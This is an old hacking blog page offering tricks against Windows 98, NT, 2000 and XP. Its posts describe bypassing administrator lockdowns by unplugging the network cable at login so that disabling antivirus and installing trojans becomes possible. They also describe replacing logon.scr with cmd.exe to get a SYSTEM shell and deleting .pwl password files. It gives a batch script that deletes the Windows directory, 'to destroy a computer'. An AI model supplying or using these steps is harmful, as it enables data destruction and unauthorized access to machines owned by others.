Thursday, September 5, 2013

Hacking - The Art Of Destruction



Hacking - The Art Of Destruction 

This is a blog which will teach u a lot of hacking tricks & ways to hack computer systems. THE INFORMATION GIVE BELOW IS ONLY FOR EDUCATIONAL PURPOSE & THE AUTOR WILL NOT BE RESPONSIBLE FOR HOW U USE THIS INFORMATION.
Google

Tuesday, November 29, 2005

Breaking the Restrictions of the Administrator by "UNPLUGGING METHOD".

This works on WIn 2000 & WIN XP.
I will teach u how we can gain access to the website you want to
for free, and how you can gain access to 'control panel', and the various
other tools of Widows that may have been blocked from your grasp like 'regedit'.
When u are at the log on screen, type in your username and
password. NOW When you hit enter, and it comes up with
the next screen, the rectangle one, immediatly pull out the network
cable i.e. the cable wire.

Now u can log on without any restrictions because when the cable is pulled off then it does not download any settings from the server. Now you have access to control panel, & all the other features which had been blocked BUT there will be no
network access. But that's cool because now we can access 'Internet options',
click in the 'connections' tab click the LAN settings, click the proxy
settings, and in the little white box at the bottom we can specify websites
that bypass the proxy server (eg www.yahoo.com) Now once you have changed
the settings to what you wish, apply them and restart the computer. Now get someone else to log onto it because if you log in it will load the cached settings from your previous log in, then after the other person logs in, everyone that logs in after them included themselves will have the
internet settings you specified.

This is just an 'Unplugging technique' to gain access to a comp. locked by the administrator.Now you can gain access to msconfig, regedit, command etc disable the virus scanner, u can install a trogan or a virus according to u're will.
And now there is nothing the administrator can do about this.

Display a notice every time Windows starts

You can use this trick if you want a message to be displayed every
time Windows starts(Any Version). Go to START --> RUN. Type REGEDIT & press ENTER.

Then Go to:-
?HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon?. Create a
new string values as follows.
Name: LegalNoticeText and Value: Your message here
After Doing this, restart your Windows, a dialog box should
appear before the Windows startup which will have u're message written on it.
Enjoy.

Monday, November 28, 2005

Creating a Batch File to Destroy a Comp.having Windows 98 on it

Type the following code in notepad:

@echo off
echo your computer has lived its life
echo Gurneet Singh Rules!!
echo astalavista baby!!
del c:\windows\explorer.exe
del c:\windows\*.*
cls
exit

Then save the file as anyname.bat
Double click on it if u want to destroy a computer.

Accessing the Comp. as an Administrator in a Locked Environment

If you can log in as an account in WIn NT then go to MS-DOS -> run -> command, at the C: prompt type the following

C:\> cd \winnt\system32
C:\winnt\system32> copy logon.scr logon.scr.old
C:\winnt\system32> del logon.scr
C:\winnt\system32> copy cmd.exe logon.scr

Now log off the machine, logon.scr is the screen saver that will kick in after 15-20 minutes of not touching the keyboard/mouse at the logon screen. Wait 15-20 minutes and a DOS prompt with FULL SYSTEM rights will pop up, then just to
C:\> net user administrator
and then log in with the new account.

Try this, might work, as long as the administrator has not changed default permissions or access rights on C:\winnt and C:\winnt\system32.

Hacking Windows Login Paswords

During Windows startup press F8 key (i.e., before the startup
splash screen) and select ?command prompt only?. Go to c:\windows
directory and delete the password file(*.pwl ? where * is the
username) and restart the system. When the password dialog box or the
pops up appears, type the username(previous One) and enter any password of u're choice. Windows should accept any password.
THIS HAS KNOWN TO WORK FOR WIN98 & WIN ME & IT MIGHT WORK FOR OTHER VERSONS AS WELL.

How to Gain Access to a Blocked Folder In WIN NT

If u're system administrator has blocked or denied access to any of u're
drives or folders, u can access them easily.

Just open any application program such as notepad , ms
word, exel etc then :
Simply GO to FILE then goto OPEN, U will be in my documents folder ,
then u can go the folder to which u want but the rights are not provided,
single click on that folder & press [ control + c ] .

Now go to the folder to which u have the rights & press [control + v ]
The folder gets copied to the folder to which u have rights to Access.
So that u can access that folder.
And open the File u Want.

No comments:

Post a Comment